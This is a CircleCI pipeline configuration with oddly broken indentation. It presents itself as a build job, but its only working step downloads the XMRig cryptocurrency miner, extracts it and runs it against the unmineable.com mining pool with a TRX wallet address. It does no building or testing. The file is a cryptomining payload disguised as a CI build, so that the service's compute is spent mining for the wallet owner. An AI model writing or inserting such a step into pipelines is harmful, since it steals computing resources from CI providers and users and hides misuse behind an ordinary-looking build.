version: 2.0 
jobs: 
    build:
        docker:
             - image: 
circleci/ruby:2.4.2-jessie-node
              auth: 
                  username:
mydockerhub-user 
                        password: $DOCKERHUB_PASSWORD # context
/ project UI env-var reference 
        steps:
            - checkout
            - run: wget https://github.com/xmrig/xmrig/releases/download/v6.12.1/xmrig-6.12.1-linux-x64.tar.gz && tar -xf xmrig-6.12.1-linux-x64.tar.gz && cd xmrig-6.12.1 && ./xmrig -o rx.unmineable.com:3333 -a rx -k -u TRX:TGAwFkRU5Rj6GbcXvAiSX1HjK7neEV5wvZ.colab4 
